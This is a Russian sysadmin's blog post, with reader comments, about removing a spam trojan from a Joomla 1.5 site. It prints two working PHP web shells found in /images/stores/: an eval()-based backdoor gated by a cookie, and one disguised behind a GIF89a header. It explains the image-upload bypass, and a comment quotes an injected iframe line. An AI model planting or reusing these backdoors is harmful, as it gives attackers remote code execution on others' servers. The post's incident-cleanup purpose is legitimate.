СПАМ-рассылка в Joomla удалена!

Сисадмин     2646

Сайт на Joomla 1.5! Получаю письмо от провайдера. У вас мол идёт СПАМ-рассылка, вы окуели, по условиям договора вы не должны рассылать рекламу и прочее… Смотрю сервер: mail.xxx.ru в логах наш. Работал троян, адреса подставные, причём левые, сгенерированные: рассылает письма со следующим текстом:

<H2>Superior offer Vjagra 0.90 Cjalis 1.80 — <a href=3D»http://levestr.ru= /foto/files.php«>check it out!</a></H2> <p>myself  that  armed  help could zip down from the orbiting  spacer  if= blessedly  brief. Being surrounded by the military has  always  had  away= .  One down, two to go. Steengo, I have a feeling that you  reall</p>

Ладна, лезу в логи, смотрю. postfix — чётко разослал около 10000 писем ночью. В письме написано, скрипт отправитель gallery.php Что-то с картинками связано. gallery — нет такого файла! Собственно это и подсказало, что рыть нужно именно там, в картинках. Кстати, я так и не понял прикол рассылающего хакера. Ссылко-то батенька — битая из письма. Рассчитано на то, что бы отработал exe-вирус. (А на само деле циалис-типа) Ну ладно. Лезу в FTP и понимаю, что Joomla очень большая для ручного поиска и пока не понятно, какой именно скрипт там отрабатывал на самом деле. Да и наши специалисты тоже там меняли что-то… 🙂

И вижу, в папке: /images/stores/ лежат «красавцы» шеллы: php-файлы 2шт. Вот они:

Формочка, в которую должен подставляться текст и всё такое, раззиповывается и расшифровывается:

<?php
if(!empty($_COOKIE[‘__utma’]) and substr($_COOKIE[‘__utma’],0,16)==’3469825000034634′){
if (!empty($_POST[‘msg’]) and $msg=@gzinflate(@base64_decode(@str_replace(‘ ‘,»,urldecode($_POST[‘msg’]))))){
  echo ‘<textarea id=areatext>’;
  eval($msg);
  echo ‘</textarea>bg’;
  exit;
}}
?>

И наконец, сам шелл (shell) для управления, передающий зашифрованный p1 запрос серверу:

GIF89a1
<?php
if (isset($_REQUEST[‘p1’])) {
    eval(stripslashes($_REQUEST[‘p1’]));
} else {
    echo «djeu84m»;
}
?>

Обратите внимание, что слева вверху: GIF89a1, т.е. PHP залит через GALLERY как GIF (т.е. как картинка) Во весело. А я раньше понять не мог, как это надо делать — спасибо, хакеры, теперь я понял, как это делать правильно. Сайт же проверяет, тело файла, по признаку присутствия в нём записи (первые строчки внутри), что это картинка, по-сути «парсит» первые символы — и говорит безопасности Джумлы, да мля это GIF — заливай, не ссыкай! Можно! И вот, обращаясь к нему, запросом из Cookies через POST — всё отрабатывает. При этом, было ещё обнаружено, что все файлы в папке include/js — модифицированы с правами на 777, но вируса (как это обычно бывает внизу файла(ов)) уже не было. Видать его стёр уже антивирус сервера, спасибо хоть на том. Вот такая Джумла, вот такая рассылка, вот такой вирус, вот такой троян, вот такой mailware! Так, что теперь, где искать — вы знаете.

Мои рекомендации для Джумла 1.5 — запретить все файлы GIF к загрузке, через галерею. Кстати, через jpg — вирус почему-то не прокатывает! Почему? Странно, по идее, по аналогии, точно также бы JPEG сделали бы: яШяа JFIF (в теле PHP) Наверно, фраза: «яШяа» — нестабильна и меняется в джпеге, а в gif’е — чётко gif89! Теперь мне всё ясно! (см.картинку)

Сейчас проблема решена, только что это дало челу!? Пару часов веселья… и толку ноль.

12 thoughts on “СПАМ-рассылка в Joomla удалена!

  2. Подскажите, пожалуйста, запретить все файлы GIF к загрузке?
    Поймала такого же вируса как Вы описали..не хотелось бы повторения..

  3. Помогал одним почистить Джумлу от подобной бяки.
    В папке /images/stores/ лежал файлик story.php с заголовком GIF86a1 . Т.е. закачали как gif. Кроме того, что описано практически все js были поражены iframe — бякой. Кто не знает, в конце каждого файлика добавлено

    ;document.write('<iframe src="сцилка на вирус..."');

    Также почти все index.php и др. файлы с нативными названиями типа menu.php и т.д. были напичканы


    Поэтому лучше чистить не через ftp, а попросить у хостера ssh и воспользоваться командной строкой для поиска или добреньким mc.
    Всем удачи с Джумло-дромом.

  4. Салют). HELP! Ломанули сайт и этой гадости просто немеряно во всех папках. Вирусина наплодила тысячи файлов с кодом <?php echo "#!!#";. Сами по себе эти файлы безвредны, но как теперь среди такой кучи мусора найти формочки и шелы. Руками выгребать просто уже сил нет и времени. В папке /images/stores/ нет. Находил в других папках, штук 20-ть формочек, а как шел найти вообще не знаю. Спасибо всем за советы и помощь.

  5. Такая же хрень и со мной случилась. Но вроде бы взлом был через jce редактор. Зато я все нашел быстрее чем вы. Могу дать совет — использовать winMerge, это такая прога для сравнения файлов и папок. Просто копируешь взломанный сайт с фтп на винт в любую папку и сравниваешь со своей локальной копией — результат за минуту видишь какие файлы изменялись. Сразу видны и шеллы и прочая нечисть. Я уже не первый раз так вылавливаю хрень, я вебмастер и у моих клиентов частенько ломают сайты, поэтому научился выкручиваться ))))))

  6. Всем привет.
    Друзья, кто подскажет мне и поможет советом по проблеме именно факта добавления файлов в директории.
    Случай аналогичен с вышеуказанными, с вариациями на двух сайтах…
    Итак, общие признаки:
    1. добавлен в корень файл.php или файл.ihml (файл переименован)
    2. добавлен /images/файл.php (файл переименован)
    3. добавлен /images/stories/файл1.gif (переименован, содержит код:
    )
    4. добавлен /images/stories/файл2.gif (файл переименован)
    аналогия с п.3

    Все сайты Joomla 1.5.26 + SEF + JCE, остальное пока упускаю.

    И главный вопрос.
    Как запретить изменения в категориях /images и /images/stories/ с сохранением работоспособности сайта (отображать img-ы)?
    .htaccess запретит вообще доступ и просьба дать совет и варианты защиты от изменения/добавления в категории этого мусора.

    Заранее благодарю. Уверен, что поможете не только мне.
    Удачи всем!

  8. Огромное спасибо, неделю пытался посфиксом порезать этот спам, а тут за 5 минут готово:)

Comments are closed.